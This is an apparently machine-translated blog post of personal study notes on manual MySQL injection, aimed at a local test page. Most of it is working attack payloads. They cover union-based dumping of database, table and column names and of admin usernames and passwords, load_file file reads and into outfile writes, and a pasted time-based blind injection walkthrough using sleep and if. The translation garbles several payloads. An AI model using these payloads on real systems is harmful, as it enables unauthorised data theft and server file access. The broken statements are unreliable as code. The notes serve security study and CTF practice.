MySQL Injection Chapter

Blog This thing really test patience, every write a note, are in the difficult decision to implement, after all, who have lazy side, like this, MySQL injection, drag and drop dragged until now to start summing up, because this is too much too miscellaneous, thin summary of a too burning brain.

Because I did not find PHP real-local source code, so I had to use some of the vulnerability of the platform to demonstrate the source code, can not be demonstrated, only the listing of codes, no actual operation diagram. After all, can't find the source code, can't ...

First we all know that MySQL database differs from Access database in that MySQL is divided into multiple database names.


Just like I posted this format, forgive me is that there is no local source code, even the database is not, so, can not open the actual diagram.

in MySQL injection, we do not discuss the other MySQL skill class, only injection, here, the database can be divided into two parts, one is more than 5.0, one is 5.0 or less. Because in more than 5.0 of the version, there will be a similar virtual INFORMATION_SCHEMA this database, which summarizes the big database, all the data, that is, in other database A, database B within the data, can be found here, Under 5.0, you can only guess the library name, table name, and column name, just like an Access database.

Now describes several of the functions and table library names that are commonly used in penetration testing.

Database name: Databases ()

Database version: Version ()

Database User: User ()

Operating system: @ @version_compile_os

System User name: System_user ()

Current user name: Current_User

User name for connection database: Session_user ()

Read database path: @ @datadir

MySQL installation path: @ @basedir

Load_file to 16 binary or 10 binary MySQL read local file function

into outfile write function

Table to store all table name information: information_schema.tables

Table Name: table_name

Database name: Table_schema

Column Name: column_name

Table to store all column name information: information_schema.columns

Okay, here's the beginning of the statement of my construction, here first, I will summarize the very fine, but I will not summarize in this article some of the techniques of injection bypass, will only summarize some of the injected libraries, tables, columns of the statement. MySQL injection can be divided into a number of injection methods, from ordinary injection, error injection, and then to the blind, there are some wonderful injection point statement, that is. As we all know about post injection, cookie injection, string injection, search injection, these injection techniques, I will dedicate a piece of paper to record, because these are tricky.

I will now record the injection method above mysql5.0, 5.0 below as I said before, no rules to follow, all by the Mongolian, all by guessing, and Access database. First I need to determine if I can inject and then judge the number of fields, both of which are the same as the Access database injection, and 1=1, and 1=2, and the number of order by fields. The remaining injected library name, table name, column name, data is the focus.

Http://127.0.0.1/mysql/sql.php?x=1

If this is an injection point and we know that his number of fields is 3, then our statement is:

Http://127.0.0.1/mysql/sql.php?x=1 Union Select-A-

Then directly enter to see if you can burst the numbers, here and access is different, there is no need to add the table name in the back, because we do not know what the table name is, if it is below 5.0, we can only like access to guess.

If it bursts, 3 of these three fields, then we can inject some information.

Http://127.0.0.1/mysql/sql.php?x=1 Union Select Database (), version (), User ()

With these three functions, we replace the three positions of the three-to-one, and then we can draw the database name, database version, database user, remember this is the name of the current database, and the user.

If we know:

Current database name: Sqlin

Database version: 5.5.40

Current database User: [email protected]

Of course we can be replaced by other functions, such as @datadir to get the database path, @ @version_compile_os to get the operating system, to the operating system, win the case is not most grateful, but the size of Linux is very most grateful, can not be wrong, this to remember.

The following starts the construction to get the table name under the current database:

Http://127.0.0.1/mysql/sql.php?x=1 Union SELECT GROUP_CONCAT (table_name), 2,3 from

Information_schema.tables where Table_schema=0x73716c696e20

The meaning of this statement is to get all the table names under the current database, 0X73716C696E20

This is the hex code, you can use the Small Kwai conversion tool to convert, is the first step to collect the current database name hex code. Of course, we can also be a one to inject the current database under all the table names, and so on, let me go to find my notebook, I turned my own in the book record. Amount, missing, estimated forget school did not take,, I go online looking for a post.

Http://127.0.0.1/mysql/sql.php?x=1 Union Select table_name,2,3, from INFORMATION_SCHEMA. Schemata Limit 0,1

This is also can be injected into the current database table name, but is a single output, you know the control limit after the number can be, such as 0, 1, 1, 2, 2,3 is this format.

But I still like to burst out, and then one after another to find a possible account of the table, so I just record all the burst.

If we select the name of the table named Admin, then we start to burst out the name of the list.

The following begins the construction of the statement that injects the column names under the current table name:

Http://127.0.0.1/mysql/sql.php?x=1 Union Select Group_concat (column_name), 2,3 from

Information_schema.columns where table_name=0x61646d696e

This will burst all the names of the columns under the table name, 0x61646d696e This is the hex transcoding of the admin name that we just checked.

This step down, we get the listing, if we choose Username, password These two column names, then I began to explode the data, this is very simple,

Http://127.0.0.1/mysql/sql.php?x=1 Union select 1,username,password from admin

This is not to come out, right there is a method, the use of a word points, the name of all the information within the column.

Http://127.0.0.1/mysql/sql.php?x=1 Union Select 1,group_concat (Username,0x5c,password), 3 from admin

This is the use of a point, out of all the data.

This is the simplest routine test, and I have listed a load_file () function in the above function, which is used to read the contents of the path, but must be an absolute path, such as: D:\mysql\123,txt it can only read the contents of such an absolute path.

This is an example:

Http://127.0.0.1/mysql/sql.php?x=1 Union Select Load_file (' D:/mysql/123,txt '), 2,3

This is a read, root permissions and normal permissions can be very different, if it is root, you can read all, if not root, is normal, you can only read the normal user to read files. By the way, root, there is a function in front, I have to say into the outfile write function, this must be the root permission to do, and you need to know the absolute path.

This is an example:

Http://127.0.0.1/mysql/sql.php?x=1 Union Select ' Shiyan ', 2,3 into outfile ' d:/mysql/123,txt '

By the right, I do not know that you have found me in the address used/this, and no use of this, a small puzzle, I do not elaborate.

Is it all right to be here? Wrong! My blind statement, and the error statement has not been summarized ... Start the summary now.

Construct the blind statement first, the core of the blind is to rely on if judgment to inject, I go to ... I built a local notepad on a half-day, just want to open a question,, the blind is not a few simple statements can be summed up, like the above, although summed up, but also is a common use of MySQL manual injection, there are a lot of other and so on ... Forget, I directly paste a bar, in the dark cloud article, a great God summed up, but also only a small part, there are many other construction statements, his article for understanding blind can understand, but generally this kind of test is directly on the Sqlmap artifact directly run, After all, manual injection is only because of the flexibility of the characteristics have been retained, can be various around, a variety of tests, so it must be.

I'm going to start with this big god summary MySQL manual blind, (if the great God himself saw, feel infringed, I can direct messages to me, I will delete.) ）

-----------------------------------------------------------------------------------------------------------

MySQL Manual Blinds

[email protected]

The core of the blinds is injected by the if judgment.

Review the If judgment and other functions before manual blinds

Version () is to view database versions
Database () to view the names of the databases
User () View current users
The length (xxxxx) functions are the lengths of the statistical strings

Mid (str,1,3) string intercept


Cut to 3 at the end of Byte 1.


The column of knowledge
ORD () converts to ASCII code


ASCII code Comparison table ASCII code table


IF Syntax:

if (condition, true,false);

Start Manual Blinds

SELECT * FROM admin where user = "admin" and sleep (2); Execution takes 2 seconds

1. Get the database name length
Database () to view the names of the databases


# # (SELECT Length (Database ()))
Query database name length


SELECT * FROM admin where user = "admin" and Sleep (if ((select Length (Database () = 2), 5,0));
If the length of the database is equal to 2 then execute true or False
At last it became sleep (0)

True if the database length is equal to 7
At last it became sleep (5)

That is, select * from admin where user = "admin" and sleep (5)

Finally know the database length is 7 then the next step is to get the database name

2. Get the database name
Database length is 7
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), () () = ' a '), 5,0));
Execute false to indicate that the first byte is not a

SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), () = ' x '), 5,0));
Execution true Execution 5 seconds description The first byte is X

Then slowly inject into 7 ...
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), () = ' x '), 5,0));
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), 2,1) = ' I '), 5,0));
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), 3,1) = ' n '), 5,0));
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), 4,1) = ' d '), 5,0));
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), 5,1) = ' O '), 5,0));
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), 6,1) = ' n '), 5,0));
SELECT * FROM admin where user = "admin" and Sleep (if ((select Mid (Database (), 7,1) = ' g '), 5,0));
The first byte is an X
The second byte is I
The third byte is n
The fourth byte is D
The fifth byte is an O
The sixth byte is n
The seventh byte is a G
It's all done for 5 seconds and then you know the database is Xindong

Of course, this method is relatively slow injection, such as some databases are special symbols? So what? A single symbol to guess the solution?
Use the ORD function for ASCII code to make it quick.

Like what:

SELECT * FROM admin where user = "admin" and sleep (if (ORD () ((Select Mid (Database (), ()) > 200, 5,0));
Condition: More than 200 execution false description not greater than
SELECT * FROM admin where user = "admin" and sleep (if (ORD () ((Select Mid (Database (), ()) > 100, 5,0));
Condition: Greater than 100 true indicates greater than
SELECT * FROM admin where user = "admin" and sleep (if (ORD () ((Select Mid (Database (), ()) > 120, 5,0));
Condition: More than 120 execution false description not greater than
SELECT * FROM admin where user = "admin" and sleep (if (ORD () ((Select Mid (Database (), ()) > 110, 5,0));
Condition: Greater than 110 true indicates greater than

Indicates that the ASCII code of the first byte of the database is greater than 110 less than 120
Description is between 110~120

SELECT * FROM admin where user = "admin" and sleep (if (ORD () ((Select Mid (Database (), 1, 1)) = 120, 5,0));

equals 120 execution True indicates that the first byte of the ASCII code is 120

The last decoding is X.


3. Get the table name length

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1, Sleep (if (length (table_name) = 5, 5,0)) from Information_ Schema. TABLES where table_schema=database () limit 0, 1;

byte equals 5 execution True
Description Table name length is 5


4. Get the table name


Get 1th Byte
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (table_name,1,1) = ' A ', 5,0)] from I Nformation_schema. TABLES where table_schema=database () limit 0, 1;
The request time is 5 seconds the description is a

Get 2nd Byte

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (([select mid (table_name,2,1) = ' d ', 5,0)) from I Nformation_schema. TABLES where table_schema=database () limit 0, 1;
The request time is 5 seconds the description is D

Get 3rd Byte

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (table_name,3,1) = ' m ', 5,0)] from I Nformation_schema. TABLES where table_schema=database () limit 0, 1;
The request time is 5 seconds and the description is M

Get 4th Byte

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (([select mid (table_name,4,1) = ' I ', 5,0)) from I Nformation_schema. TABLES where table_schema=database () limit 0, 1;
The request time is 5 seconds description is I

Get 5th Byte

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (table_name,5,1) = ' n ', 5,0)] from I Nformation_schema. TABLES where table_schema=database () limit 0, 1;
The request time is 5 seconds and the description is n




5. Get the first field length of a table name
Table name is: admin 16 binary: 61646d696e
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (length (column_name) = 4,5,0)] from Informatio N_schema. COLUMNS where table_name=0x61646d696e limit 0, 1;

Request time 5 seconds indicates that the first sub-segment has 4 bytes

6. Get the first field name of a table name


SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (column_name,1,1) = ' u ', 5,0)] from Information_schema. COLUMNS where table_name=0x61646d696e limit 0, 1;

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (column_name,2,1) = ' s ', 5,0)] from Information_schema. COLUMNS where table_name=0x61646d696e limit 0, 1;

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (column_name,3,1) = ' E ', 5,0)] from Information_schema. COLUMNS where table_name=0x61646d696e limit 0, 1;

SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if ((select mid (column_name,4,1) = ' R ', 5,0)] from Information_schema. COLUMNS where table_name=0x61646d696e limit 0, 1;


The first field to burst is the user


Then the first field may be the user name and the password field is less than 5. Gets the first field length of the table name to get the next field length from limit, then get the password field

7. Get Database Content
7.1 Guess the length of the database for the first field first
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (user = 5, 5,0)) from admin limit 0, 1;
Execution 5 seconds indicates the data content byte length of this field is 5

So it's getting the data.
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (mid (user,1,1) = ' A ', 5,0)] from admin limit 0 , 1;
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (mid (user,2,1) = ' d ', 5,0)] from admin limit 0 , 1;
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (mid (user,3,1) = ' m ', 5,0)] from admin limit 0 , 1;
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (mid (user,4,1) = ' I ', 5,0)] from admin limit 0 , 1;
SELECT * FROM admin where user = ' admin ' and 1=2 Union select 1,sleep (if (mid (user,5,1) = ' n ', 5,0)] from admin limit 0 , 1;

And then the user name is admin.


Finally posted,,,,, these basically can understand the manual blind principle and construction, of course, if you want to continue in depth, you can go to Baidu,,, to search it ... After all, these are just some fur.

The following began to say that other errors injected,, this I studied for a long time, then a new year, I forgot the same .... A good variety of error injection,, this I am really can only find information to a piece of, I myself is handwritten,, have forgotten almost ....

are hyperlinks, they want to go deep can find information.

10 MySQL Error injection What is the principle of echo injection based on MySQL error? MySQL burst injection method to organize MySQL error injection principle analysis (count (), Rand (), group BY) MySQL Injection summary &mysql Critical Error injection method finishing classic MySQL Duplicate entry error injection

Well, these are almost, I have seen, although still not very proficient,, after all, this in the CTF will appear in the problem ....

Summary, there is no source code, can not be demonstrated, the above said I use offensive platform bar, later thought, I also prepared to open a post, record my local attack platform, the post, in advance, I feel I have no power record. This article, as said above, a lot of skills are not recorded, pure simple record, after all, I want to put the skills of the summary into a post.

Every record, is the review of their own knowledge, like people engaged in training, more talk will not forget, I am the more I write more summary summary, even if I forget, I look at my own records will soon think up.

MySQL Injection Chapter